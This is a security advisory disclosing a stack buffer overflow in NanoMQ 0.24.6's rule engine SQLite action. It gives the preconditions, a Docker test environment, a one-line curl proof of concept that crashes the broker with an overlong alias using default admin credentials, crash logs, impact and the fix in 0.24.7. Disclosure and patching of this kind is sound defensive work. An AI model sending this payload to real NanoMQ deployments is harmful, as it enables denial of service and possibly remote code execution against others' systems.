📄 NanoMQ 0.24.6 Remote Buffer Overflow

NanoMQ Rules Engine Remote Buffer Overflow
    
    =======
    Summary
    =======
    
    A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a Denial of Service (DoS) and potentially achieve Remote Code Execution (RCE). The vulnerability requires admin privileges, but use of default credentials (admin:public) may be common, lowering the barrier to access and increasing the practical impact.
    
    Target: NanoMQ (emqx/nanomq:latest-full image tested)
    Version Affected: ≤ 0.24.6
    
    ============
    How It Works
    ============
    
    The vulnerability is located in the Rule Engine's SQLite integration. When a user creates a rule with a SQLite action, NanoMQ dynamically constructs a CREATE TABLE SQL statement. The flaw stems from the unsafe use of the string copy functions.
    
    For the vulnerability to be exploitable, two conditions must be met:
    
    1. HTTP Server Must Be Enabled: The NanoMQ HTTP server must be active to expose the /api/v4/rules endpoint.
    
    2. Rule Engine Must Be Compiled: The NanoMQ binary must be compiled with the Rule Engine feature enabled (-DENABLE_RULE_ENGINE=ON). This is not the default for release binaries.
    
    However, note that the popular emqx/nanomq:latest-full Docker image, which has over 100,000 downloads, comes with the rule engine enabled by default, making it vulnerable if HTTP server is enabled.
    
    =======
    Testing
    =======
    
    Triggering the buffer overflow requires sending a POST request to the /api/v4/rules endpoint. The request must contain a JSON payload with a long alias in the rawsql field.
    
    ===========
    Environment
    ===========
    
    docker run -d --name nanomq-test -p 8081:8081 -e NANOMQ_HTTP_SERVER_ENABLE=true emqx/nanomq:latest-full
    
    ===
    PoC
    ===
    
    curl -u admin:public -X POST http://localhost:8081/api/v4/rules -H "Content-Type: application/json" -d "{\"rawsql\": \"SELECT qos as $(perl -e 'print \"A\" x 180' ) FROM \\\"test/topic\\\"\", \"actions\": [{\"name\": \"sqlite\", \"params\": {\"table\": \"table\"}}]}"
    
    After sending the request, the NanoMQ instance will crash, and the logs will show buffer overflow detection.
    
    ====
    Logs
    ====
    
    *** buffer overflow detected ***: terminated
    WARN  /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:1288 broker: NanoMQ (ver 0.24.6) Serving HTTP Server on http://(null):8081
    NanoMQ Broker is started successfully!
    ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: near "table": syntax error
    
    ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
    ERROR /home/runner/work/nanomq/nanomq/nanomq/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: (null)
    
    ERROR /home/runner/work/nanomq/nanomq/nanomq/rest_api.c:1858 post_rules_sqlite: Sqlite post error!
    ERROR /home/runner/work/nanomq/nanomq/nanomq/apps/broker.c:114 sig_handler: signal signumber: 6 received!
    
    ======
    Impact
    ======
    
    This vulnerability may lead to:
    
    - Denial of Service (DoS): A remote attacker can crash the NanoMQ broker with a single request.
    - Remote Code Execution (RCE): A sophisticated attacker could potentially craft a payload to exploit the buffer overflow and execute arbitrary code.
    
    ==========
    Mitigation
    ==========
    
    The vulnerability was addressed in NanoMQ version 0.24.7 by replacing an unsafe strcpy() function with snprintf(). This ensures that all string operations are bounds-checked, preventing the buffer overflow.
    
    The fix was introduced in this commit:
    - https://github.com/nanomq/nanomq/commit/f6f5d1d2c01cbd56212924a1dfb59152ac63cc81
    
    Users can upgrade to NanoMQ version 0.24.7 or later to mitigate this vulnerability.
    
    Other mitigations could include ensuring the HTTP server or Rules Engine is disabled.
    
    Jeremy Brown (jbrown3264/gmail), Jan 2026